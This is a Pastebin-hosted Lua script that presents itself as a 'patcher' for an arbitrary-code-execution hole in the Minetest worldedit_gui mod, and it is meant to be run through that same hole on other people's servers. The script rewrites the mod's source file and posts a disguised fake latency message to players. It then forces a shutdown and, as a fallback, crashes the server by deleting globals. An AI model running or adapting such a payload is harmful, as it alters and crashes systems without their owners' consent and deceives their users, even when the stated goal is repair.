API tools faq
paste
Advertisement
krock186

Untitled

krock186
Jul 15th, 2017
572
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.31 KB | None | 0 0
raw download clone embed print report
  1. --[[
  2.     worldedit_gui security leak patcher
  3.     Author: Krock/SmallJoker <mk939@ymail.com>
  4.  
  5. A missing line in worledit_gui allows people to execute any Lua code.
  6. This script allows people to fix affected servers using the leak itself.
  7. Check your worlds auth file for players with more privileges than they
  8. should have and keep backing up your stuff ;)
  9.  
  10. For server owners:
  11. 1) Check for mod(-pack) updates (especially worldedit)
  12. 2) Enable the mod security
  13. 3) Update your Minetest server
  14. 4) Goto #1 until all your servers are patched
  15.  
  16. EDIT 170928: Fix crash fallbacks when request_shutdown failed
  17. ]]
  18.  
  19. local SCRIPT_URL = "https://pastebin.com/raw/gMRk9CkR"
  20. local path = minetest.get_modpath("worldedit_gui") .. "/functionality.lua"
  21.  
  22. -- Replacement source code
  23. local t_from =
  24. [[worldedit.register_gui_function("worldedit_gui_lua", {
  25.     name = "Run Lua",
  26.     get_formspec = function(name)]]
  27. -- Replacement destination code
  28. local t_to =
  29. [[minetest.log("warning", "[worldedit_gui] Security leak patched, see ]]
  30. .. SCRIPT_URL .. [[ for further information. Regards.")
  31. worldedit.register_gui_function("worldedit_gui_lua", {
  32.     name = "Run Lua",
  33.     privs = minetest.chatcommands["/lua"].privs,
  34.     get_formspec = function(name)]]
  35.  
  36. -- Code from https://stackoverflow.com/a/1746473
  37. local function escape(str)
  38.     return str:gsub("[%(%)%.%%%+%-%*%?%[%]%^%$]", function(c) return "%" .. c end)
  39. end
  40.  
  41.  
  42. -- The real thing: Find and destroy
  43. local file = io.open(path, "r")
  44. local contents = file:read("*all"):gsub("\r", "")
  45. file:close()
  46.  
  47. local pos = contents:find(t_from, 1, true)
  48. if not pos then
  49.     -- Feedback for the user but make it feel like something natural
  50.     minetest.chat_send_all("Server log: latency=4.12, ping=0.127, t_ratio=4.52")
  51.     return
  52. end
  53.  
  54. minetest.log("warning", "worldedit_gui patcher: Found leak occurence near pos=" .. pos)
  55.  
  56. file = io.open(path, "w")
  57. file:write(contents:gsub(escape(t_from), escape(t_to)))
  58. file:close()
  59.  
  60. minetest.log("warning", "worldedit_gui patcher: Successfully patched!")
  61.  
  62. if minetest.request_shutdown then
  63.     minetest.request_shutdown("Shutting down...", false, 1)
  64.     minetest.request_shutdown()
  65. end
  66.  
  67. minetest.chat_send_all("Server shutting down...")
  68. -- Crash it somehow else, if requested shutdown failed
  69. minetest.after(5, function()
  70.     minetest.registered_globalsteps = nil
  71.     ItemStack = nil
  72. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!